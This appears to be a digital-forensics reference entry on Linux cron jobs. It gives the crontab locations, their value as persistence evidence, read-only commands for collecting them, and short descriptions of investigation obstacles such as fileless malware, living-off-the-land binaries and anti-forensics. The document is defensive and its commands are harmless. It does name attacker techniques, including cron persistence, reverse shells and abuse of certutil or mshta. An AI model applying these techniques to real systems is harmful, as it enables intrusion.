Cron Jobs
Location
/etc/crontab, /etc/cron.d/*, /var/spool/cron/crontabs/<user>Description
Scheduled task definitions across system-wide crontab, the cron.d drop-in directory, and per-user crontabs. Each entry specifies a schedule, user context, and command to execute.
Forensic Value
Cron is the most common Linux persistence mechanism. Attacker cron entries typically download and execute payloads from external URLs, restart reverse shells at intervals, or run cryptominers. Checking /var/spool/cron/crontabs/ for all users reveals per-user entries that do not appear in the system-wide crontab. File modification timestamps on cron files help establish when persistence was installed.
Tools Required
Collection Commands
tar
tar czf /forensics/output/cron_all.tar.gz /etc/crontab /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/ /var/spool/cron/
find
find /var/spool/cron/crontabs/ -type f -exec cat {} \; > /forensics/output/user_crontabs.txtcat
cat /etc/crontab /etc/cron.d/* > /forensics/output/system_crontabs.txt
find
find /etc/cron.d /var/spool/cron -type f -newer /etc/os-release -ls > /forensics/output/recently_modified_cron.txt
Collection Constraints
- •Paths and log sources vary by distribution, init system, logging stack, and installed packages. Validate the active distro and service set before treating absence as meaningful.
MITRE ATT&CK Techniques
References
Used in Procedures
Related Blockers
Attack Delivered via Legitimately Signed Update
The malicious artifact carries a valid signature from the vendor's real signing key, so traditional allow-by-signature controls (Authenticode policy, Cosign verification, macOS notarization) do not flag it. Detection must pivot to behavioral indicators, reputation, and anomaly-based signals.
Mining Incident Treated as Low Priority by Stakeholders
Stakeholders frame unauthorized mining as "just a resource cost" and push for immediate process-kill and closure rather than a full investigation. This under-scoping routinely leaves the entry vector open and misses secondary compromise (webshells, backdoors, credential theft) the attacker installed alongside the miner.
Fileless Malware With Minimal On-Disk Footprint
The suspected malware runs primarily in memory with minimal or no on-disk persistence. Traditional file-hash IoC hunts return empty, and disk-image analysis misses the active payload. Response must pivot to memory forensics, ETW, PowerShell script-block logging, and AMSI telemetry.
Attacker Living Off the Land with Native Binaries
The attacker relies on legitimate system binaries (PowerShell, certutil, bitsadmin, regsvr32, rundll32, mshta, wmic) for execution and lateral movement. File-reputation and signature-based detection fails because the binaries are legitimate; detection must shift to behavioral anomaly, parent-child process analysis, and command-line context.
Deep Anti-Forensics: Timestomping, Rootkits, Secure Delete
The attacker has employed anti-forensic techniques: timestomping ($MFT/$STANDARD_INFORMATION manipulation), log clearing (Security.evtx wiped, journalctl truncated), NTFS alternate data stream hiding, rootkits, file-attribute masking, or secure-delete of specific indicators. Standard forensic analysis produces incomplete or misleading results.